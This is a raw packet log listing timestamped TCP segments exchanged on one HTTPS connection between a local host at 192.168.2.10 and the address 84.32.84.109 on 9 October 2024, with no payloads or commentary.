Oct 9, 2024 16:16:06.483601093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.483613014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.483625889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.483649969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.511915922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.511976004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.511991978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512003899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512017012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512022972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512046099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512049913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512063026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512069941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512098074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512674093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512706995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512732983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512739897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.512757063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.512773991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516316891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516387939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516392946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516408920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516436100 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516452074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516464949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516505957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516505957 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516516924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516546011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516555071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516561985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.516573906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.516587019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.519707918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.519778967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.519779921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.519790888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.519835949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.519961119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520005941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520015001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520020962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520045996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520127058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520153999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520173073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520179033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520211935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520239115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520271063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520287991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520293951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520315886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520356894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520416021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520428896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520473957 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520483971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520535946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520607948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520648956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520653963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.520663023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.520690918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.548180103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.548239946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.548242092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.548257113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.548295021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.548327923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.548372984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.548521042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.548559904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.571235895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571285009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571312904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.571329117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571346045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571365118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.571393013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.571398020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571412086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571430922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.571436882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.571456909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.599771976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.599853992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.599873066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.599885941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.599915028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.599922895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.599935055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.599939108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.599982023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.599993944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.600004911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.600033998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.600130081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.600167990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.600176096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.600225925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.600292921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.600337029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.603980064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604063034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604074001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.604083061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604106903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.604198933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604233980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.604242086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604270935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604273081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.604283094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604305029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.604408979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604437113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604454041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.604460955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.604481936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.607669115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607733011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.607742071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607758999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607779026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.607784986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607800961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607803106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.607834101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.607840061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607875109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.607888937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607904911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.607925892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608040094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608072996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608074903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608083010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608108997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608203888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608241081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608247042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608283043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608397007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608434916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608438969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608445883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608469963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608484983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608628035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608669043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608673096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608681917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608709097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608717918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.608719110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608731031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.608758926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.635771036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.635932922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.635941029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.635951996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.636033058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.636105061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.636105061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.636121035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.636154890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.636246920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.636280060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.659187078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.659292936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.659308910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.659353971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.660588980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.660629988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.660646915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.660659075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.660681009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687319040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687366009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687427998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687443972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687482119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687483072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687515974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687520981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687527895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687551975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687793970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687838078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687844992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687860012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687891006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.687899113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.687910080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.691556931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691613913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.691622972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691636086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691658020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.691683054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691715002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691715956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.691725969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691757917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.691772938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691807985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.691814899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.691858053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.695240021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.695311069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.695372105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.695415020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.695426941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.695461035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.695467949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.695481062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.695497990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696043015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696084023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696091890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696125984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696135998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696144104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696160078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696275949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696322918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696326971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696340084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696369886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696372032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696410894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696419001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696460009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696487904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696535110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696544886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696573973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696593046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.696599007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.696613073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.723660946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.723718882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.723742008 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.723757029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.723768950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.723783970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.723804951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.723809958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.723846912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.723877907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.723913908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.747023106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.747071981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.747124910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.747142076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.747159958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.748239994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.748289108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.748301983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.748336077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.748342037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.748349905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.748368025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775118113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775234938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775320053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775320053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775336027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775352955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775393009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775412083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775415897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775424957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775456905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775573969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775605917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775621891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.775639057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.775654078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779494047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779545069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779572010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779580116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779597998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779606104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779638052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779644966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779656887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779675961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779683113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779700994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779819965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779865980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779875040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779901981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.779913902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779925108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.779959917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783066988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783129930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783154011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783163071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783178091 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783178091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783227921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783235073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783241987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783265114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783658028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783713102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783720970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783761024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783782005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783832073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783873081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.783922911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.783993006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784029961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784039974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.784048080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784069061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.784085989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.784120083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784162998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.784172058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784215927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:06.784221888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784230947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:06.784255028 CEST	49723	443	192.168.2.10	84.32.84.109
